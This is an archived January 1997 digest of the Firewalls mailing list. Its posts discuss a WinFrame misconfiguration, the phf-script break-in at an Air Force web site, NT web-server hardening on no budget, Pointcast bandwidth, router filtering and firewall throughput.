(8.7.1-lists/Lists-960417-1) id BAA03091 for firewalls-outgoing; Wed, 8 Jan 1997 01:18:51 -0800 (PST) Received: from mhaaf.inhouse.compuserve.com (mhaaf.inhouse.compuserve.com [149.174.64.79]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA02989 for ; Wed, 8 Jan 1997 01:18:12 -0800 (PST) Received: from notes2.compuserve.com (cserve-aagw2.notes.compuserve.com [149.174.221.199]) by mhaaf.inhouse.compuserve.com (8.6.9/8.6.12) with SMTP id FAA08289.; Wed, 8 Jan 1997 05:43:01 -0500 Received: by notes2.compuserve.com (IBM OS/2 SENDMAIL VERSION 1.3.17/2.0) id AA3746; Wed, 08 Jan 97 04:17:50 -0500 Message-Id: <9701080917.AA3746@notes2.compuserve.com> Received: by External Gateway (Lotus Notes Mail Gateway for SMTP V1.1) id 33EB2F0BAA9F00004125641900310EB1; Wed, 8 Jan 97 04:17:41 To: darren cromer Cc: "'xavier fauquet'" , "'les @tracker.demon.co.uk'" , "'firewalls @greatcircle.com'" From: "massimo.cotrozzi" Date: 8 Jan 97 10:04:10 Subject: RE: Using Remote Workstation as Hole?? Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >On Mon, 6 Jan 1997 00:49:13 +0100, you wrote: >>Could someone points me to a site explaining me what is >>Winframe ? > >I think ... http://www.cytrix.com ? > >Winframe is a remote processing system which allows PC clients to run server >applications on a Windows system rather than using their own processing >power. > >I think. > >...Les... > One very nice hole of poor ( common ) installation of Win Frame is that if you let people using browsers ( say nt ie 2 ) on the server side of the connection they just can "browse" an executable ( say winfile ) and ... voila' pop-up a window browsing the server from the client .... ( This one is just a few hit away on your keyboard ) Massimo Cotrozzi Arthur Andersen - Computer Risk Management Computer Security Senior Consultant Via della Moscova 3, 20121 Milano Tel. ++ 39-2-290371 From firewalls-owner Wed Jan 8 02:59:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA10986 for firewalls-outgoing; Wed, 8 Jan 1997 02:51:50 -0800 (PST) Received: from ram-exch-ns1.ramstein (ram-exch-ns1.ramstein.af.mil [132.25.130.19]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA10979 for ; Wed, 8 Jan 1997 02:51:38 -0800 (PST) Received: by ram-exch-ns1.ramstein with Microsoft Exchange (IMC 4.0.837.3) id <01BBFD5A.65422BE0@ram-exch-ns1.ramstein>; Wed, 8 Jan 1997 11:52:17 +0100 Message-ID: From: Franke Albert 2 Lt USAFE CSS/SCBS To: "'firewalls@GreatCircle.com'" Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 11:52:29 +0100 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am responsible for securing (as well as I can) a DEC Alpha running Windows NT 4.0 and Internet Information Server as our WWW Server. It is sitting as a node on our LAN and everyone in the world can access it. I want a program that I can run on it that will allow/disallow blocks of IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but not as necessary) it to keep detailed logs. I have heard of O'Reiley's WebSite, but I don't know if this will do. I do not have funding for an expensive firewall machine, and it is impracticle to add routers into our LAN. Please help if you have any suggestions. Thanks. albert.franke@ramstein.af.mil Albert E. Franke, 2Lt, USAF OIC, USAFE Web Tech Support 480-7905 From firewalls-owner Wed Jan 8 03:14:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA11282 for firewalls-outgoing; Wed, 8 Jan 1997 03:08:29 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA11274 for ; Wed, 8 Jan 1997 03:08:19 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id fa137831 for ; Wed, 8 Jan 1997 12:07:48 +0100 Received: by ppp52.sbbs.se with Microsoft Mail id <01BBFD5C.41D55860@ppp52.sbbs.se>; Wed, 8 Jan 1997 12:05:36 +0100 Message-ID: <01BBFD5C.41D55860@ppp52.sbbs.se> From: Sebastian Stache To: "'patton@sysnet.net'" Cc: "'Firewalls (inet/GreatCircle)'" Subject: RE: Air Force Web Site Hacked Date: Wed, 8 Jan 1997 12:05:34 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I fully agree. At the same time I'm relieved, since it means we're not experiencing anything magical. ---------- From: Matthew Patton[SMTP:patton@sysnet.net] Sent: den 5 januari 1997 00:50 To: Sebastian Stache Subject: Re: Air Force Web Site Hacked >Or are there html >specific inherent weaknesses not necessarily in the protocol but in the anchient and poor setups used by most casual webadmins. Not 1 week before the incident I urged ASSIST (the military pseudo equiv of CERT) to start beating the drum about patheticly insecure websites. People routinely leave test-cgi with all it's niceties left available. Did they have FTP? Probably. It is appalling how little the 'network professionals' really know about their systems, host and network security. I thought the Pentagon could command better. I'm reminded daily that this isn't so, whether it be military folk or contractors. From firewalls-owner Wed Jan 8 04:14:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA13734 for firewalls-outgoing; Wed, 8 Jan 1997 03:53:53 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id DAA13710 for ; Wed, 8 Jan 1997 03:53:25 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id oa137840 for ; Wed, 8 Jan 1997 12:52:59 +0100 Received: by ppp52.sbbs.se with Microsoft Mail id <01BBFD62.90C9FEC0@ppp52.sbbs.se>; Wed, 8 Jan 1997 12:50:46 +0100 Message-ID: <01BBFD62.90C9FEC0@ppp52.sbbs.se> From: Sebastian Stache To: "'Firewalls (inet/GreatCircle)'" Cc: "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'" Subject: Re: Re: NCSA != NCSC Date: Wed, 8 Jan 1997 12:50:35 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Wilner informed me that: > Everything except boot-up depends upon the O/S. Nothing is below the "O/S > layer," nor does one speak of such a layer unless one intends "application as well as > layer" and doesn't know an application from an O/S, nor can a single byte be > sent or retrieved over a device (networked or otherwise) unless an O/S is > relied upon, nor can a single access to memory, disk, or what-have-you be and more. This is all quite surprising to me. Even though I like to do so when I'm moody, it's not common practise to refer to MS Windows 3 as an application. Most people would call it an (however able or not) Operating System. And yet, Windows 3 is in every way running on top of DOS. With Windows 95, Microsoft has tried to make it less appearant that DOS is still required. They even remap the video adapter's base address during boot, so as to hide the familiar DOS black-screen. In fact, Microsoft in some ways tries to convince their customers that the windowed environment is nothing but an alternate shell (GUI) to the operating system. To this end, you can choose to start WITHOUT activating the "GUI" by putting a statement "BootGUI=0" in a configuration file. This will render you a text-only shell which looks very much like a DOS-prompt. No wonder, it *is* a DOS-prompt (in almost every detail equivalent to DOS version 7), and nothing else. You don't have long-filename support, you don't have any network facilities, you can't even use your printers. Unless you type "win", to start Windows 95. As a matter of interest, this is exactly what happens if you change the "BootGUI=0" to "BootGUI=1" - "win" is inserted into the command queue after all other statements in Autoexec.bat has been executed. Now suppose I wanted to use Drivespace, an MS technique to compress harddisks on the fly. Or even better, Stacker, a 3rd- party equivalent. Either of these would install themselves BELOW Windows 95 (and even more interestingly, in some respects even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS). To Windows 95 (and to DOS), the compression activities would be transparent, ie Windows would not *know* about them. Which of course is the whole point. I don't think there's any point in mentioning utilities that halt the computer when a virus is detected, or when battery status is low, or when the Debug-mode button is pressed, or when a source-routed packet arrives. From firewalls-owner Wed Jan 8 04:59:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA16306 for firewalls-outgoing; Wed, 8 Jan 1997 04:49:35 -0800 (PST) Received: from lab58-12.ims.advantis.com (pony-express.ims.advantis.com [192.231.11.167]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA16289 for ; Wed, 8 Jan 1997 04:49:19 -0800 (PST) Received: (from hfarkas@localhost) by lab58-12.ims.advantis.com (8.6.9/95.10.11) id HAA21439; Wed, 8 Jan 1997 07:46:01 -0500 Received: from d5664655.ims.advantis.com(164.120.51.69) by lab58_12 via smap (V1.3) id sma028861; Wed Jan 8 07:45:55 1997 Received: by gandalf.ims.advantis.com (8.6.9/950921) id HAA27475; Wed, 8 Jan 1997 07:56:33 -0500 Date: Wed, 8 Jan 1997 07:56:33 -0500 (EST) From: "Henry W. Farkas" To: "Starkweather, Mike" cc: "'firewalls@GreatCircle.COM'" Subject: Re: Pointcast In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 7 Jan 1997, Starkweather, Mike wrote: > I am wondering how the members of this mail list have handled the > flood of traffic generated by Pointcast. It has buried our firewall > (Tis Toolkit) with the huge number of requests it generates. Their > I-Server seems to help some but not as much as I had hoped. For starters, you might ask everyone to update on a limited schedule, customized schedule, or manually: that is, only when the update button is pressed. We had the same problem. It turns out that most people simply did not understand the implications of the "all day schedule" option, which claims to be "best for direct internet connections". So, that's what many people chose. Simply informing them helped quite a bit, but we are still considering getting our own Pointcast server. Partly because there is an "early morning slam" on our firewalls, caused by a flood of people coming in, updating Pointcast and reading Dilbert.... =============================================================================== Outside of a dog, a book is a man's best friend. Inside of a dog, it's too dark to read. PGP fingerprint AA D0 F5 44 C1 8C 11 52 - B3 80 34 1C CE 38 EC 53 From firewalls-owner Wed Jan 8 05:14:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA17135 for firewalls-outgoing; Wed, 8 Jan 1997 05:02:40 -0800 (PST) Received: from hp01.vak12ed.edu (hp01.vak12ed.edu [141.104.150.251]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA17126 for ; Wed, 8 Jan 1997 05:02:22 -0800 (PST) Message-Id: <199701081302.FAA17126@miles.greatcircle.com> Received: by hp01.vak12ed.edu (1.37.109.20/16.2) id AA126788459; Wed, 8 Jan 1997 08:00:59 -0500 From: "W.C. Epperson" Subject: Re: To Firewall or Not to Firewall? To: cwlim@ncs.com.sg (Henry Lim Chee Wee) Date: Wed, 08 Jan 1997 8:00:59 EST Cc: firewalls@greatcircle.com In-Reply-To: <32D2F4C6.5DA5@ncs.com.sg>; from "Henry Lim Chee Wee" at Jan 08, 97 9:13 am Reply-To: epperson@vak12ed.edu X-Mailer: Elm [revision: 109.18] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Henry could of sed: > > IMHO, a firewall is necessary as long as you are not running a > standalone web server with sole access to the Internet. O'Reiley's > WebSite is an application program running over a largely insecure > OS platform that will still allow the purposeful prankster to ruin > your show for a laugh. > Sigh. All together now: Step 1: risk assessment Step 2: security policy Step 3: implementation (including firewall if needed) Remember the old cartoon with the caption "You guys start coding and I'll go up and see what they want"? -- W.C. Epperson "I have great faith in fools. Senior SE Self-confidence, my friends call it." Information Security Officer --Edgar Allan Poe-- DBA Emeritus Curmudgeon-for-Life Virginia Dept. of Education epperson@pen.k12.va.us From firewalls-owner Wed Jan 8 05:30:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA15502 for firewalls-outgoing; Wed, 8 Jan 1997 04:38:17 -0800 (PST) Received: from NUHUB.DAC.NEU.EDU (nuhub.dac.neu.edu [129.10.1.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA15472 for ; Wed, 8 Jan 1997 04:38:00 -0800 (PST) From: JOHNSON@neu.edu Received: from neu.edu by neu.edu (PMDF V4.3-7 #11963) id <01IDYNDRCOUO99DTTA@neu.edu>; Wed, 8 Jan 1997 07:37:33 EST Date: Wed, 08 Jan 1997 07:37:33 -0500 (EST) Subject: Firewall throughput measurements. To: firewalls@GreatCircle.com Message-id: <01IDYNDREAPU99DTTA@neu.edu> X-Envelope-to: firewalls@GreatCircle.com X-VMS-To: IN%"firewalls@GreatCircle.com" X-VMS-Cc: JOHNSON MIME-version: 1.0 Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [decloack] I remember sometime back there were firewall throughput questions concerning what happens if a firewall box is used with high speed links on both sides. In my case I'm thinking 4 or 16 mb token ring on one side and similar links on the other or TR to Ethernet or Ethernet to Ethernet. The numbers I've seen are measured with a T1 on one side and an Ethernet on the other. In this case the T1 is the throttle and you expect a certain traffic rate. But it was unknown back then what happens in the other cases mentioned above. No I expect that there will be a delay more sigificant than that of a router. A firewall isn't a router; it's a firewall. A great many firewall functions happen at layer 7 while strict routing is a layer 3 issue. So there's more software to plow through generally speaking in a firewall. And I'm sure the numbers will depend on just how much firewalling is going on. Has anybody done any measurements of what happens when a firewal is used between two high speed links? I'd be very interested in numbers or pointers to same. Thanks. Chris J. NU [recloak] ============================================================================ Chris Johnson Internet: johnson@nuhub.dac.neu.edu Assistant Director, Systems BITNET: defunct Division of Academic Computing Voice: 617.373.3300 Northeastern University, 39RI FAX: 617.373.8600 360 Huntington Ave. 50% of all doctors graduated Boston, MA. U.S.A. 02115 in the lower half of the class ============================================================================ From firewalls-owner Wed Jan 8 05:49:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA16530 for firewalls-outgoing; Wed, 8 Jan 1997 04:52:37 -0800 (PST) Received: from gateway.superonline.net (gateway.superonline.net [194.242.73.254]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA16465 for ; Wed, 8 Jan 1997 04:52:07 -0800 (PST) Received: by gateway.superonline.net; (5.65v3.2/1.3/10May95) id AA12393; Thu, 9 Jan 1997 14:52:47 +0300 Received: by postman.superonline.net with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5) id <01BBFD73.41575750@postman.superonline.net>; Wed, 8 Jan 1997 14:50:14 +0200 Message-Id: From: =?iso-8859-1?Q?=22A=2E_=D6mer_K=F6ker=22?= To: "'Firewalls@GreatCircle.COM'" , "'Matthew Patton'" Subject: RE: USAF: how it was hacked Date: Wed, 8 Jan 1997 14:50:13 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Interestingly enough this specific hole was described in detail on the latest 2600mag. =20 now you know they will start reading it... >---------- >From: Matthew Patton[SMTP:patton@sysnet.net] >Sent: 08 Ocak 1997 =C7ar=FEamba 01:09 >To: Firewalls@GreatCircle.COM >Subject: USAF: how it was hacked > >No, this isn't about cdrom based web content. > >Really quite anticlimatic. The infamous phf script was left active on=20 >the server and was how they got in. Root, the whole 9 yards. > >What's really funny is that no more than a week prior to the incident, = I=20 >suggested to ASSIST (the military's equiv of CERT, and now financial=20 >sponsor of same) that in light of the minor poking around I did on a=20 >handful of military web sites, that they needed to get the word out to=20 >admins because so many servers were in a high state of misconfiguration = >and just waiting to be exploited. 7 days later, boom!! > >I'm not sure on what grounds people place so much trust in the military = >to do things right with respect to host and network security. I'm sure = >there are segments that do a damn fine job, but seeing the abject lack = of=20 >skills and knowledge in the Pentagon area makes me a mite bit skeptical = >and not a little ashamed. It's a wonder we don't see high profile=20 >exploits on a routine basis. Don't get me wrong, the private sector=20 >doesn't have their act together on many fronts as well. > >Now hopefully the thread can die in peace. > From firewalls-owner Wed Jan 8 05:53:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA18774 for firewalls-outgoing; Wed, 8 Jan 1997 05:40:01 -0800 (PST) Received: from ultra1.dreamscape.com (ultra1.dreamscape.com [206.64.128.7]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA18760 for ; Wed, 8 Jan 1997 05:39:41 -0800 (PST) Received: from bertha (sc21.dreamscape.com [206.114.183.214]) by ultra1.dreamscape.com (8.8.4/8.8.4) with SMTP id IAA04884 for ; Wed, 8 Jan 1997 08:40:19 -0500 (EST) Message-ID: <32D3A3BF.5D36@dreamscape.com> Date: Wed, 08 Jan 1997 08:40:15 -0500 From: "Steven E. Matkoski" Reply-To: uscny8hb@ibmmail.com Organization: Blue Cross Blue Shield of CNY X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: internal filtering router - filter config? References: <199701080648.WAA21235@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest wrote: > > In your external router you'd block any ICMP traffic going back and > forth, as well as any packets bearing one of your internal IP addresses, > as a source address, especially if these are going INTO your protected > network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill > any ports that your users will not be using, andl leave just mail, web, > ftp, etc. > > ricardo > ralvarado@avantel.com.mx > Thanks, I also read that you could block source-routed packets there, also. If I am using a cisco router, how does on go about this? or can I get a location for documentation. Thanks! -steve. matkoski@dreamscape.com From firewalls-owner Wed Jan 8 06:16:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20614 for firewalls-outgoing; Wed, 8 Jan 1997 06:08:53 -0800 (PST) Received: from nucleus.com (nucleus.com [199.45.65.129]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA20604 for ; Wed, 8 Jan 1997 06:08:42 -0800 (PST) Received: from geo-x.com (geo-x.com [199.45.65.239]) by nucleus.com (8.8.4/8.8.4) with ESMTP id HAA11956 for ; Wed, 8 Jan 1997 07:08:45 -0700 (MST) Received: from mail.geo-x.com (mail-ppp.geo-x.com [192.168.1.2]) by geo-x.com (8.6.12/8.6.12) with ESMTP id HAA22440 for ; Wed, 8 Jan 1997 07:05:32 -0700 Received: from tstas ([192.2.2.34]) by mail.geo-x.com (8.6.12/8.6.12) with SMTP id HAA12021 for ; Wed, 8 Jan 1997 07:08:22 -0700 Date: Wed, 8 Jan 1997 06:59:10 -0700 (MST) From: Tom Szucs X-Sender: tas@tstas To: firewalls@greatcircle.com Subject: NFS Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What sort of security issues revolve around running NFS on a network ? Can filesystems be exported securely to a specific host, provided that we can control routes which would prevent spoofed IP addresses from being able have any data routed back correctly ? We are running direct ethernet connections as well as ATM PVCs. Any assistance would be appreciated and can be sent to me directly. I can post highlights or key points back to the group. Thanx in advance. Tom Szucs, Geo-X Systems Ltd. From firewalls-owner Wed Jan 8 06:29:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21285 for firewalls-outgoing; Wed, 8 Jan 1997 06:17:04 -0800 (PST) Received: from ncept.pt.nce.sita.int (ncept.pt.nce.sita.int [57.7.6.251]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA21228 for ; Wed, 8 Jan 1997 06:16:36 -0800 (PST) Received: from pc_ptdv.pt.nce.sita.int by ncept.pt.nce.sita.int (8.7.3/SitaNet-1.4) id PAA21833; Wed, 8 Jan 1997 15:16:38 +0100 (MET) Date: Wed, 8 Jan 97 15:16:05 PST From: Denis Valois Subject: Re: Firewalls-Digest V6 #8 To: Firewalls@GreatCircle.COM, michael dreves X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1 Content-Transfer-Encoding: 8BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Cher Michael, Comme tu peux le constater, c'est plutôt désagréable de ne pouvoir comprendre un message affiché. Ŕ l'avenir, pourrais-tu composer tes messages dans un dialecte compréhensible pour tous, ou alternativement envoyer les-dits messages aux seuls destinataires légitimes. Merci d'avance de ta compréhension et de ton civisme, Denis Valois Sécurité informatique SITA (Société Internationale de Télécommunications Aéronautiques) On Wed, 08 Jan 1997 10:16:14 +0100 michael dreves wrote: >Hej sřde sus, > >her kommer flemmings nye e-mail....der er faktisk tale om to addresser, >som vi skal proeve: > >drc@drc.baku.az (Danish Refugee Council. >fdr@drc.baku.az (formentelig flemming) > > >kh. > >-- michael dreves (MD113-RIPE), System Consultant > Berendsen Data, Phone +45-39577300, Fax +45-39577302 > Key fingerprint = 01 99 2B 6F F1 2E 47 4D 87 6D 98 55 91 42 F8 4D > From firewalls-owner Wed Jan 8 06:49:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22304 for firewalls-outgoing; Wed, 8 Jan 1997 06:30:55 -0800 (PST) Received: from radmail.rad.co.il (radmail.rad.co.il [192.114.26.219]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA22244 for ; Wed, 8 Jan 1997 06:30:25 -0800 (PST) Received: from radguard.com ([192.114.26.210]) by radmail.rad.co.il (post.office MTA v1.9.3 ID# 0-12126) with SMTP id AAA18351 for ; Wed, 8 Jan 1997 16:31:57 +0200 Received: by radguard.com (4.1/SMI-4.1) id AA28221; Wed, 8 Jan 97 16:30:34 IST Received: from elgamal.radguard.co.il(192.114.33.2) by gatekeeper.radguard.com via smap (V1.3) id sma028218; Wed Jan 8 16:30:14 1997 Received: from rosebud (boaz.radguard.com) by elgamal.radguard.com (4.1/SMI-4.1) id AA22671; Wed, 8 Jan 97 16:29:12 IST Message-Id: <32D3AED8.4DB7@queenstown.org> Date: Wed, 08 Jan 1997 16:27:36 +0200 From: mike X-Mailer: Mozilla 3.0 (Win95; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: FW-1 hacked? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all Does anyone know if FW-1 was ever hacked? From firewalls-owner Wed Jan 8 07:01:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22726 for firewalls-outgoing; Wed, 8 Jan 1997 06:42:52 -0800 (PST) Received: from mail1.acccorp.com ([204.124.88.54]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA22710 for ; Wed, 8 Jan 1997 06:42:39 -0800 (PST) Received: from ccMail by mail1.acccorp.com (IMA Internet Exchange 2.02 Enterprise) id 2D3B3AC0; Wed, 8 Jan 97 09:48:12 -0500 Mime-Version: 1.0 Date: Wed, 8 Jan 1997 09:36:47 -0500 Message-ID: <2D3B3AC0.@acccorp.com> From: KBarlow@acccorp.com (Ken Barlow) Subject: Re: Pointcast To: "'firewalls@GreatCircle.COM'" , "Starkweather; Mike" Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We too had this problem. We bent to the will of Pointcast and purchased the server software, and it doesn't work as advertised. It's buggy, hard to configure, many unpublished problems (nevertheless known to some ppl in Customer Service) It did reduce traffic though. We also shutdown the pointcast sites from every internal machine except the pointcast server. I find it's one of those subjects that costs alot and produces _no_ benefit for the company. Regards, Ken B. ACC Long Distance ______________________________ Reply Separator _________________________________ Subject: Pointcast Author: "Starkweather; Mike" at Internet Date: 1/7/97 1:29 PM I am wondering how the members of this mail list have handled the flood of traffic generated by Pointcast. It has buried our firewall (Tis Toolkit) with the huge number of requests it generates. Their I-Server seems to help some but not as much as I had hoped. If this is the wrong place for this question please redirect me. Mike Starkweather Anheuser-Busch From firewalls-owner Wed Jan 8 07:14:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23930 for firewalls-outgoing; Wed, 8 Jan 1997 07:06:36 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA23909 for ; Wed, 8 Jan 1997 07:06:23 -0800 (PST) Message-Id: <199701081506.HAA23909@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A75B878800D4; Wed Jan 08 11:03:55 1997 From: "Jamie Thain" To: "Franke Albert 2 Lt USAFE CSS/SCBS" , "'firewalls@GreatCircle.com'" Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 11:02:14 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank, I might refer your captain to the hacking of the af site that happened a week ago, and there might be some funding appear. NT properly secured can take some licks, but if it were moi, I would dig up an old 486 with a couple of network cards and put a Linux machine with FWTK in front of it. You must have a UNIX person around. I have to pay the consulting time, and it normally costs me about $1,000 per configuration session, but the software is free. But, Do all that you can to secure the NT machine. 1. Put two network cards in the machine, one inside and one out, and disable the IP routing. 2. Disable the Bindings for Wins to Workstation, Server and NetBios in the bindings to the OUTSIDE card. 3. Under the TCP/IP protocol - Properties - Advanced select Enable Security, then configure the security and allow only TCP port 80 if you are serving Web only. Add other ports for the ports you are serving. 4. Rename the Administrator account to something else like BigMachineBoss, or even better, Steve Smith (no reference to roll). 5. Turn on Auditing. 6. Put the WebServer entirely on a separate drive and give access for the Web server only to that drive. 7. Check the eventvwr security log often. 8. Go to http://www.somarsoft.com and read through the NT security faq. This is just a start, and other I am sure will kick in... regards:jamie From firewalls-owner Wed Jan 8 07:34:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA24113 for firewalls-outgoing; Wed, 8 Jan 1997 07:11:04 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA24092 for ; Wed, 8 Jan 1997 07:10:48 -0800 (PST) Message-Id: <199701081510.HAA24092@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A8517E39002A; Wed Jan 08 11:08:01 1997 From: "Jamie Thain" To: "darren cromer" , "massimo.cotrozzi" Cc: "'xavier fauquet'" , "'les@tracker.demon.co.uk'" , "'firewalls@greatcircle.com'" Subject: Re: Using Remote Workstation as Hole?? Date: Wed, 8 Jan 1997 11:06:20 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Massimo, You should be able to run Winfile.exe on you winframe and the users should not be able to cause damage. You should not have to use a browser to get there. The idea is to secure the central computer so a single user can use the OS without damaging it. Although I know I can think of ways to damage it, and I am sure students would as well, you can take away most rights from the client of any importance. It is difficult however to keep them from filling the disk with unwanted files if they have write rights to any directory, as NT does not have a native disk auditor. regards:jamie ---------- > From: massimo.cotrozzi > To: darren cromer > Cc: 'xavier fauquet' ; 'les@tracker.demon.co.uk'; 'firewalls@greatcircle.com' > Subject: RE: Using Remote Workstation as Hole?? > Date: Wednesday, January 08, 1997 6:04 AM > > > > >On Mon, 6 Jan 1997 00:49:13 +0100, you wrote: > >>Could someone points me to a site explaining me what is > >>Winframe ? > > > >I think ... http://www.cytrix.com ? > > > >Winframe is a remote processing system which allows PC clients to run server > >applications on a Windows system rather than using their own processing > >power. > > > >I think. > > > >...Les... > > > > > > One very nice hole of poor ( common ) installation of Win Frame is that if you > let > people using browsers ( say nt ie 2 ) on the server side of the connection they > just > can "browse" an executable ( say winfile ) and ... voila' pop-up a window > browsing the server from the client .... > ( This one is just a few hit away on your keyboard ) > > Massimo Cotrozzi > > Arthur Andersen - Computer Risk Management > Computer Security Senior Consultant > Via della Moscova 3, 20121 Milano > Tel. ++ 39-2-290371 From firewalls-owner Wed Jan 8 09:23:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA01010 for firewalls-outgoing; Wed, 8 Jan 1997 08:47:04 -0800 (PST) Received: from gatekeeper.mcimail.com (gatekeeper.mcimail.com [192.147.45.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA00961 for ; Wed, 8 Jan 1997 08:46:36 -0800 (PST) Received: from mailgate.mcimail.com (mailgate.mcimail.com [166.40.135.3]) by gatekeeper.mcimail.com (8.6.12/8.6.10) with SMTP id QAA08376; Wed, 8 Jan 1997 16:42:58 GMT Received: from mcimail.com by mailgate.mcimail.com id ae29880; 8 Jan 97 16:47 WET Date: Wed, 8 Jan 97 11:46 EST From: Peter Ngo To: drexx , David Wee Cc: firewalls Subject: Re[2]: FW-1 throughput? Etc. Message-Id: <34970108164643/0007044148PJ2EM@MCIMAIL.COM> X-MB-Info: Serial #: 191-30-2807 VERSION: 2.01H Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, 1. There is a good white paper of Firewall-1 Performance Testing results based on Sun Ultra 170, Sparc5, and X86 with Solaris 2.5 @ http://CheckPoint.com 2. It does support VPN. There is a VPN patch. 3. Check the home page http://checkpoint.com. Hope this would help, Peter Ngo 